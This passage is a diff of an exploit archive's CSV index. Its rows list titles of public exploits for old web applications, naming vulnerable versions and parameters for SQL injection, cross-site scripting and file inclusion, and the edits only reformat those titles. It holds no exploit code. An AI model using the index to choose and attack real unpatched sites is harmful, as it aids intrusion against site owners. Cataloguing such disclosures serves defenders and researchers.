id,file,description,date,author,platform,type,port 23012,platforms/php/webapps/23012.txt,"News Wizard 2.0 - Full Path Disclosure",2003-08-11,G00db0y,php,webapps,0 23013,platforms/php/webapps/23013.txt,"PHP Website 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - SQL Injection",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23014,platforms/php/webapps/23014.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 Calendar Module - 'day' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - fatcat_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - PAGE_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - 'fatcat_id' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 pagemaster Module - 'PAGE_id' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php?idx' SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps,0 22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board - SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 22986,platforms/php/webapps/22986.txt,"Macromedia Dreamweaver MX 6.0 - PHP User Authentication Suite Cross-Site Scripting",2003-08-04,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22990,platforms/php/webapps/22990.txt,"vBulletin 3.0 - register.php HTML Injection",2003-08-06,"Ferruh Mavituna",php,webapps,0 -22992,platforms/asp/webapps/22992.txt,"IdealBB 1.4.9 - error.asp Cross-Site Scripting",2003-08-07,G00db0y,asp,webapps,0 +22990,platforms/php/webapps/22990.txt,"vBulletin 3.0 - 'register.php' HTML Injection",2003-08-06,"Ferruh Mavituna",php,webapps,0 +22992,platforms/asp/webapps/22992.txt,"IdealBB 1.4.9 - 'error.asp' Cross-Site Scripting",2003-08-07,G00db0y,asp,webapps,0 22995,platforms/php/webapps/22995.txt,"C-Cart 1.0 - Full Path Disclosure",2003-08-08,G00db0y,php,webapps,0 22997,platforms/php/webapps/22997.txt,"PostNuke 0.6/0.7 Downloads Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22998,platforms/php/webapps/22998.txt,"PostNuke 0.6/0.7 web_links Module - TTitle Cross-Site Scripting",2003-08-08,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -27112,7 +27113,7 @@ id,file,description,date,author,platform,type,port 23001,platforms/php/webapps/23001.txt,"Invision Power Board 1.0/1.1/1.2 - 'admin.php' Cross-Site Scripting",2003-08-09,"Boy Bear",php,webapps,0 23004,platforms/multiple/webapps/23004.txt,"Oracle OpenSSO 8.0 - Multiple Cross-Site Scripting POST Injection Vulnerabilities",2012-11-29,LiquidWorm,multiple,webapps,0 23005,platforms/asp/webapps/23005.txt,"FCKEditor Core ASP 2.6.8 - Arbitrary File Upload Protection Bypass",2012-11-29,"Soroush Dalili",asp,webapps,0 -23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module - PDA_limit Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +23017,platforms/php/webapps/23017.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 earch Module - 'PDA_limit' Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23018,platforms/php/webapps/23018.txt,"PHPOutsourcing Zorum 3.4 - Full Path Disclosure",2003-08-11,"Zone-h Security Team",php,webapps,0 23020,platforms/php/webapps/23020.txt,"HostAdmin - Full Path Disclosure",2003-08-12,G00db0y,php,webapps,0 23021,platforms/cgi/webapps/23021.txt,"Eudora WorldMail 2.0 - Search Cross-Site Scripting",2003-08-12,"Donnie Werner",cgi,webapps,0 @@ -27129,11 +27130,11 @@ id,file,description,date,author,platform,type,port 23057,platforms/php/webapps/23057.txt,"newsPHP 216 - Remote File Inclusion",2003-08-25,Officerrr,php,webapps,0 23058,platforms/php/webapps/23058.txt,"newsPHP 216 - Authentication Bypass",2003-08-25,Officerrr,php,webapps,0 23059,platforms/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 - Information Disclosure",2003-08-25,"cyber talon",cgi,webapps,0 -23060,platforms/php/webapps/23060.txt,"Py-Membres 4.x - Secure.php Unauthorized Access",2003-08-26,frog,php,webapps,0 +23060,platforms/php/webapps/23060.txt,"Py-Membres 4.x - 'Secure.php' Unauthorized Access",2003-08-26,frog,php,webapps,0 23061,platforms/php/webapps/23061.txt,"Py-Membres 4.x - 'Pass_done.php' SQL Injection",2003-08-26,frog,php,webapps,0 23064,platforms/php/webapps/23064.txt,"Attila PHP 3.0 - SQL Injection Unauthorized Privileged Access",2003-08-26,frog,php,webapps,0 -23065,platforms/php/webapps/23065.txt,"AldWeb MiniPortail 1.9/2.x - LNG Parameter Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps,0 -23067,platforms/php/webapps/23067.txt,"eNdonesia 8.2/8.3 - Mod Parameter Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps,0 +23065,platforms/php/webapps/23065.txt,"AldWeb MiniPortail 1.9/2.x - 'LNG' Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps,0 +23067,platforms/php/webapps/23067.txt,"eNdonesia 8.2/8.3 - 'Mod' Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps,0 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - 'Message' HTML Injection",2003-09-01,Trash-80,php,webapps,0 23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal",2003-09-01,"Zero X",cgi,webapps,0 @@ -27146,15 +27147,15 @@ id,file,description,date,author,platform,type,port 23111,platforms/multiple/webapps/23111.txt,"FirePass SSL VPN - Unauthenticated Local File Inclusion",2012-12-03,"SEC Consult",multiple,webapps,0 23120,platforms/asp/webapps/23120.txt,"ICQ 2003 - Webfront Guestbook Cross-Site Scripting",2003-09-08,"Donnie Werner",asp,webapps,0 23125,platforms/php/webapps/23125.txt,"phpBB 2.0.6 - URL BBCode HTML Injection",2003-09-08,keupon_ps2,php,webapps,0 -23127,platforms/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Cross-Site Scripting",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 -23128,platforms/cgi/webapps/23128.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Full Path Disclosure",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 +23127,platforms/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine - 'PAGE' Cross-Site Scripting",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 +23128,platforms/cgi/webapps/23128.txt,"Escapade 0.2.1 Beta Scripting Engine - 'PAGE' Full Path Disclosure",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 23129,platforms/php/webapps/23129.txt,"Invision Power Board 1.x - 'index.php' showtopic Cross-Site Scripting",2003-09-09,"Boy Bear",php,webapps,0 23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal",2012-12-04,Nin3,windows,webapps,0 23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authenticated SQL Injection",2003-09-12,frog,php,webapps,0 23153,platforms/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i - Cross-Site Scripting",2003-09-16,dr_insane,cgi,webapps,0 23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - 'banners.php?bid' SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - 'emailarticle.php?id' SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 -23160,platforms/php/webapps/23160.txt,"Mambo Site Server 4.0.14 - contact.php Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps,0 +23160,platforms/php/webapps/23160.txt,"Mambo Site Server 4.0.14 - 'contact.php' Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps,0 23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0 23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - 'auth.inc.php' SQL Injection",2003-09-20,"Lifo Fifo",php,webapps,0 40403,platforms/php/webapps/40403.txt,"Dolphin 7.3.0 - Error-Based SQL Injection",2016-09-20,"Kacper Szurek",php,webapps,80 @@ -27212,8 +27213,8 @@ id,file,description,date,author,platform,type,port 23332,platforms/cgi/webapps/23332.txt,"MPM Guestbook 1.2 - Cross-Site Scripting",2003-11-03,"David Ferreira",cgi,webapps,0 23333,platforms/php/webapps/23333.txt,"PHPKit 1.6 - 'Include.php' Cross-Site Scripting",2003-11-02,ben.moeckel@badwebmasters.net,php,webapps,0 23335,platforms/asp/webapps/23335.txt,"VieNuke VieBoard 2.6 - SQL Injection",2003-11-03,ekerazha@yahoo.it,asp,webapps,0 -23336,platforms/php/webapps/23336.txt,"OpenAutoClassifieds 1.0 - Listing Parameter Cross-Site Scripting",2003-11-04,"David Sopas Ferreira",php,webapps,0 -23338,platforms/php/webapps/23338.txt,"John Beatty Easy PHP Photo Album 1.0 - dir Parameter HTML Injection",2003-11-04,nimber@designer.ru,php,webapps,0 +23336,platforms/php/webapps/23336.txt,"OpenAutoClassifieds 1.0 - 'Listing' Cross-Site Scripting",2003-11-04,"David Sopas Ferreira",php,webapps,0 +23338,platforms/php/webapps/23338.txt,"John Beatty Easy PHP Photo Album 1.0 - 'dir' HTML Injection",2003-11-04,nimber@designer.ru,php,webapps,0 23353,platforms/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 - SQL Injection",2012-12-13,Zixem,php,webapps,0 23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent Cross-Site Scripting",2012-12-13,"Mr. P-teo",php,webapps,0 23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistent Cross-Site Scripting",2012-12-13,limb0,php,webapps,0 @@ -27232,24 +27233,24 @@ id,file,description,date,author,platform,type,port 23402,platforms/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 - Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,jsp,webapps,0 23403,platforms/php/webapps/23403.pl,"My_eGallery Module 3.1.1 - Remote File Inclusion Command Injection",2003-11-26,"Bojan Zdrnja",php,webapps,0 23406,platforms/php/webapps/23406.txt,"CuteNews 1.3 - Debug Query Information Disclosure",2003-12-01,scrap,php,webapps,0 -23407,platforms/asp/webapps/23407.txt,"Virtual Programming VP-ASP 4.00/5.00 - shopsearch.asp SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 -23408,platforms/asp/webapps/23408.txt,"Virtual Programming VP-ASP 4.00/5.00 - shopdisplayproducts.asp SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 +23407,platforms/asp/webapps/23407.txt,"Virtual Programming VP-ASP 4.00/5.00 - 'shopsearch.asp' SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 +23408,platforms/asp/webapps/23408.txt,"Virtual Programming VP-ASP 4.00/5.00 - 'shopdisplayproducts.asp' SQL Injection",2003-12-01,"Nick Gudov",asp,webapps,0 23409,platforms/cgi/webapps/23409.c,"Jason Maloney's Guestbook 3.0 - Remote Command Execution",2003-12-01,shaun2k2,cgi,webapps,0 23410,platforms/cgi/webapps/23410.txt,"IBM Directory Server 4.1 - Web Administration Interface Cross-Site Scripting",2003-12-02,"Oliver Karow",cgi,webapps,0 -23415,platforms/asp/webapps/23415.txt,"Virtual Programming VP-ASP 4/5 - shopdisplayproducts.asp Cross-Site Scripting",2003-12-05,"Xnuxer Research",asp,webapps,0 +23415,platforms/asp/webapps/23415.txt,"Virtual Programming VP-ASP 4/5 - 'shopdisplayproducts.asp' Cross-Site Scripting",2003-12-05,"Xnuxer Research",asp,webapps,0 23416,platforms/php/webapps/23416.txt,"Xoops 1.3.x/2.0.x - Multiple Vulnerabilities",2003-12-06,frog,php,webapps,0 23418,platforms/cgi/webapps/23418.pl,"Webgate WebEye - Information Disclosure",2003-12-08,datapath,cgi,webapps,0 23420,platforms/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 - 'index.php' Path Cross-Site Scripting",2003-12-09,"Justin Hagstrom",php,webapps,0 23421,platforms/cgi/webapps/23421.txt,"calacode @mail webmail system 3.52 - Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Persistent Cross-Site Scripting",2012-12-16,limb0,php,webapps,0 -23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server - user.php Script Unauthorized Access",2003-12-10,frog,php,webapps,0 +23428,platforms/php/webapps/23428.html,"Mambo 4.5 Server - 'user.php' Script Unauthorized Access",2003-12-10,frog,php,webapps,0 23429,platforms/php/webapps/23429.txt,"Mambo Open Source 4.0.14 Server - SQL Injection",2003-12-10,"Chintan Trivedi",php,webapps,0 23430,platforms/php/webapps/23430.txt,"Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injections",2003-12-10,frog,php,webapps,0 23432,platforms/cgi/webapps/23432.txt,"RemotelyAnywhere - Default.HTML Logout Message Injection",2003-12-11,"Oliver Karow",cgi,webapps,0 23434,platforms/php/webapps/23434.pl,"osCommerce 2.2 - SQL Injection",2003-12-13,JeiAr,php,webapps,0 23440,platforms/asp/webapps/23440.txt,"elektropost episerver 3/4 - Multiple Vulnerabilities",2003-12-15,babbelbubbel,asp,webapps,0 23443,platforms/php/webapps/23443.txt,"Aardvark Topsites 4.1 PHP - Multiple Vulnerabilities",2003-12-16,JeiAr,php,webapps,0 -23445,platforms/php/webapps/23445.txt,"osCommerce 2.2 - osCsid Parameter Cross-Site Scripting",2003-12-17,JeiAr,php,webapps,0 +23445,platforms/php/webapps/23445.txt,"osCommerce 2.2 - 'osCsid' Cross-Site Scripting",2003-12-17,JeiAr,php,webapps,0 23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me - Setup.pl Arbitrary Command Execution",2003-12-18,"Paul Craig",cgi,webapps,0 23448,platforms/php/webapps/23448.php,"PHPWCMS 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - 'index.inc.php' File Inclusion",2003-12-20,frog,php,webapps,0 @@ -27259,23 +27260,23 @@ id,file,description,date,author,platform,type,port 23457,platforms/php/webapps/23457.txt,"BES-CMS 0.4/0.5 - 'folder.php' File Inclusion",2003-12-20,frog,php,webapps,0 23458,platforms/php/webapps/23458.txt,"BES-CMS 0.4/0.5 - 'hacking.php' File Inclusion",2003-12-20,frog,php,webapps,0 23459,platforms/php/webapps/23459.txt,"Xoops 2.0.5.1 - 'MyLinks Myheader.php' Cross-Site Scripting",2003-12-21,"Chintan Trivedi",php,webapps,0 -23462,platforms/php/webapps/23462.txt,"osCommerce 2.2 - products_id URI Parameter SQL Injection",2003-12-22,JeiAr,php,webapps,0 -23463,platforms/php/webapps/23463.txt,"osCommerce 2.2 - manufacturers_id Parameter Cross-Site Scripting",2003-12-22,JeiAr,php,webapps,0 -23466,platforms/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - store Parameter Full Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 -23467,platforms/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - template Parameter Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 +23462,platforms/php/webapps/23462.txt,"osCommerce 2.2 - 'products_id' SQL Injection",2003-12-22,JeiAr,php,webapps,0 +23463,platforms/php/webapps/23463.txt,"osCommerce 2.2 - 'manufacturers_id' Cross-Site Scripting",2003-12-22,JeiAr,php,webapps,0 +23466,platforms/cgi/webapps/23466.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - 'store' Full Path Disclosure",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 +23467,platforms/cgi/webapps/23467.txt,"iSoft-Solutions QuikStore Shopping Cart 2.12 - 'template' Directory Traversal",2003-12-23,"Dr Ponidi Haryanto",cgi,webapps,0 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,cgi,webapps,0 23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x (Multiple Modules) - SQL Injection",2004-02-02,"Security Corporation",php,webapps,0 23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 - 'email.php' Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0 23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 - 'Viewshoutbox.php' Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 23475,platforms/php/webapps/23475.txt,"phpBB 2.0.6 - 'privmsg.php' Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 23476,platforms/php/webapps/23476.txt,"KnowledgeBuilder 2.0/2.1/3.0 - Remote File Inclusion",2003-12-24,"Zero X",php,webapps,0 -23477,platforms/php/webapps/23477.txt,"Psychoblogger PB-beta1 - desc Parameter Cross-Site Scripting",2003-12-24,"Andrew Smith",php,webapps,0 +23477,platforms/php/webapps/23477.txt,"Psychoblogger PB-beta1 - 'desc' Cross-Site Scripting",2003-12-24,"Andrew Smith",php,webapps,0 23478,platforms/php/webapps/23478.txt,"Psychoblogger PB-beta1 - errormessage Cross-Site Scripting",2003-12-24,"Andrew Smith",php,webapps,0 23483,platforms/php/webapps/23483.txt,"OpenBB 1.0 - 'board.php' Cross-Site Scripting",2003-12-27,gr00vy,php,webapps,0 23484,platforms/php/webapps/23484.txt,"PHP-Nuke 6.x/7.0 Survey Module - SQL Injection",2003-12-27,idtwolf@pisem.net,php,webapps,0 23485,platforms/cgi/webapps/23485.txt,"L-Soft 1.8 - Listserv Multiple Cross-Site Scripting Vulnerabilities",2003-12-26,http-equiv,cgi,webapps,0 -23486,platforms/php/webapps/23486.txt,"Private Message System 2.x - 'index.php' Page Parameter Cross-Site Scripting",2003-12-27,"David S. Ferreira",php,webapps,0 -23487,platforms/php/webapps/23487.txt,"PHP-ping - Count Parameter Command Execution",2003-12-29,ppp-design,php,webapps,0 +23486,platforms/php/webapps/23486.txt,"Private Message System 2.x - 'index.php?Page' Cross-Site Scripting",2003-12-27,"David S. Ferreira",php,webapps,0 +23487,platforms/php/webapps/23487.txt,"PHP-ping - 'Count' Command Execution",2003-12-29,ppp-design,php,webapps,0 23488,platforms/cgi/webapps/23488.txt,"BulletScript MailList - bsml.pl Information Disclosure",2003-12-29,M0rf,cgi,webapps,0 23494,platforms/php/webapps/23494.txt,"WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload",2012-12-19,DigiP,php,webapps,0 23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",php,webapps,0 @@ -27286,7 +27287,7 @@ id,file,description,date,author,platform,type,port 23513,platforms/php/webapps/23513.txt,"Athena Web Registration - Remote Command Execution",2004-01-02,"Peter Kieser",php,webapps,0 23515,platforms/asp/webapps/23515.txt,"ASPApp PortalApp - Remote User Database Access",2004-01-04,newbie6290,asp,webapps,0 23516,platforms/asp/webapps/23516.txt,"ASP-Nuke 1.0/1.2/1.3 - Remote User Database Access",2004-01-04,"Vietnamese Security Group",asp,webapps,0 -23517,platforms/php/webapps/23517.txt,"HotNews 0.x - 'hotnews-engine.inc.php3' config[header] Parameter Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 +23517,platforms/php/webapps/23517.txt,"HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23518,platforms/php/webapps/23518.txt,"HotNews 0.x - 'config[incdir]' Remote File Inclusion",2004-01-05,Officerrr,php,webapps,0 23519,platforms/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting",2004-01-04,"David S. Ferreira",php,webapps,0 23520,platforms/php/webapps/23520.txt,"PHPGedView 2.61 - Multiple Remote File Inclusions",2004-01-06,Windak,php,webapps,0 @@ -27297,13 +27298,13 @@ id,file,description,date,author,platform,type,port 23536,platforms/php/webapps/23536.txt,"Andy's PHP Projects Man Page Lookup Script - Information Disclosure",2004-01-10,"Cabezon Aurelien",php,webapps,0 23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 - 'module.php' Remote Command Execution",2004-01-10,"Zero X",php,webapps,0 23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function Cross-Site Scripting Vulnerabilities",2004-01-16,JeiAr,php,webapps,0 -23547,platforms/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 - Adminlogin.asp SQL Injection",2004-01-16,posidron,asp,webapps,0 +23547,platforms/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 - 'Adminlogin.asp' SQL Injection",2004-01-16,posidron,asp,webapps,0 23548,platforms/cgi/webapps/23548.txt,"MetaDot Portal Server 5.6.x - 'index.pl' Multiple SQL Injections",2004-01-16,JeiAr,cgi,webapps,0 23549,platforms/cgi/webapps/23549.txt,"MetaDot Portal Server 5.6.x - index.pl Information Disclosure",2004-01-16,JeiAr,cgi,webapps,0 23550,platforms/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x - 'index.pl' Multiple Cross-Site Scripting Vulnerabilities",2004-01-16,JeiAr,cgi,webapps,0 -23551,platforms/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x - userchannel.pl op Parameter Cross-Site Scripting",2004-01-16,JeiAr,cgi,webapps,0 +23551,platforms/cgi/webapps/23551.txt,"MetaDot Portal Server 5.6.x - 'userchannel.pl?op' Cross-Site Scripting",2004-01-16,JeiAr,cgi,webapps,0 23553,platforms/php/webapps/23553.php,"Mambo Open Source 4.5/4.6 - 'mod_mainmenu.php' Remote File Inclusion",2004-01-19,Yo_Soy,php,webapps,0 -23554,platforms/php/webapps/23554.java,"YABB SE 1.x - SSI.php ID_MEMBER SQL Injection",2004-01-19,BaCkSpAcE,php,webapps,0 +23554,platforms/php/webapps/23554.java,"YABB SE 1.x - 'SSI.php' ID_MEMBER SQL Injection",2004-01-19,BaCkSpAcE,php,webapps,0 23558,platforms/php/webapps/23558.txt,"PHPix 2.0.3 - Arbitrary Command Execution",2004-01-20,"Max Stepanov",php,webapps,0 23561,platforms/asp/webapps/23561.txt,"DUware Software - Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS - 'ASP.NET' Arbitrary File Upload",2012-12-21,040,asp,webapps,0 @@ -27336,15 +27337,15 @@ id,file,description,date,author,platform,type,port 23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - 'showcat.php' SQL Injection",2004-02-04,G00db0y,php,webapps,0 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0 23653,platforms/php/webapps/23653.txt,"Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0 -23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - Itemid Parameter Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0 +23657,platforms/php/webapps/23657.txt,"Mambo Open Source 4.6 - 'Itemid' Cross-Site Scripting",2004-02-05,"David Sopas Ferreira",php,webapps,0 23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing",2004-02-06,"Tri Huynh",cgi,webapps,0 23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 'News' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0 23669,platforms/php/webapps/23669.txt,"PHP-Nuke 6.x/7.x 'Reviews' Module - Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0 23670,platforms/php/webapps/23670.pl,"PHP-Nuke 6.x/7.x - Public Message SQL Injection",2004-02-09,"Janek Vind",php,webapps,0 23673,platforms/php/webapps/23673.txt,"Guru Auction 2.0 - Multiple SQL Injections",2012-12-26,v3n0m,php,webapps,0 -23676,platforms/asp/webapps/23676.txt,"Maxwebportal 1.3x - down.asp HTTP_REFERER Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 -23677,platforms/asp/webapps/23677.txt,"Maxwebportal 1.3x - Personal Message SendTo Parameter Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 -23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0 +23676,platforms/asp/webapps/23676.txt,"Maxwebportal 1.3x - 'down.asp' HTTP_REFERER Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 +23677,platforms/asp/webapps/23677.txt,"Maxwebportal 1.3x - Personal Message 'SendTo' Cross-Site Scripting",2004-02-10,"Manuel Lopez",asp,webapps,0 +23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - 'Category' SQL Injection",2003-12-23,pokleyzz,php,webapps,0 23683,platforms/php/webapps/23683.txt,"VisualShapers EZContents 1.x/2.0 - 'db.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 23684,platforms/php/webapps/23684.txt,"VisualShapers EZContents 1.x/2.0 - 'archivednews.php' Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0 @@ -27357,19 +27358,19 @@ id,file,description,date,author,platform,type,port 23704,platforms/asp/webapps/23704.txt,"ProductCart 1.x/2.x - 'Custva.asp?redirectUrl' Cross-Site Scripting",2004-02-16,"Nick Gudov",asp,webapps,0 23705,platforms/cgi/webapps/23705.txt,"ShopCartCGI 2.3 - gotopage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 23706,platforms/cgi/webapps/23706.txt,"ShopCartCGI 2.3 - genindexpage.cgi Traversal Arbitrary File Access",2004-02-16,G00db0y,cgi,webapps,0 -23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 - Quote Parameter SQL Injection",2004-02-16,BaCkSpAcE,php,webapps,0 +23710,platforms/php/webapps/23710.txt,"YABB SE 1.5 - 'Quote' SQL Injection",2004-02-16,BaCkSpAcE,php,webapps,0 23711,platforms/php/webapps/23711.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php?id' SQL Injection",2003-02-17,"David Sopas Ferreira",php,webapps,0 23712,platforms/php/webapps/23712.txt,"eCommerce Corporation Online Store Kit 3.0 - 'More.php' Cross-Site Scripting",2003-02-17,"David Sopas Ferreira",php,webapps,0 23718,platforms/php/webapps/23718.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop.php?cat' SQL Injection",2004-02-18,G00db0y,php,webapps,0 23719,platforms/php/webapps/23719.txt,"eCommerce Corporation Online Store Kit 3.0 - 'shop_by_brand.php?cat_manufacturer' SQL Injection",2004-02-18,G00db0y,php,webapps,0 23720,platforms/php/webapps/23720.txt,"eCommerce Corporation Online Store Kit 3.0 - 'listing.php?id' SQL Injection",2004-02-18,G00db0y,php,webapps,0 -23722,platforms/php/webapps/23722.txt,"Fool's Workshop Owl's Workshop 1.0 - multiplechoice/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23723,platforms/php/webapps/23723.txt,"Fool's Workshop Owl's Workshop 1.0 - glossary.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23722,platforms/php/webapps/23722.txt,"Fool's Workshop Owl's Workshop 1.0 - 'multiplechoice/index.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23723,platforms/php/webapps/23723.txt,"Fool's Workshop Owl's Workshop 1.0 - 'glossary.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23724,platforms/php/webapps/23724.txt,"Fool's Workshop Owl's Workshop 1.0 - 